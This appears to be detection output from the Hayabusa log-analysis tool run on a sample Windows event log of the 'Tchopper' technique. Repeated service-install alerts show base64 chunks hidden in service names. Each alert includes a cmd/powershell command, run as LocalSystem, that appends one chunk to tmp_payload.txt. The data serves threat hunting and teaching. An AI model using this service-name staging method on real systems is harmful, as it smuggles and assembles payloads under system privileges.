2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:30.978 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
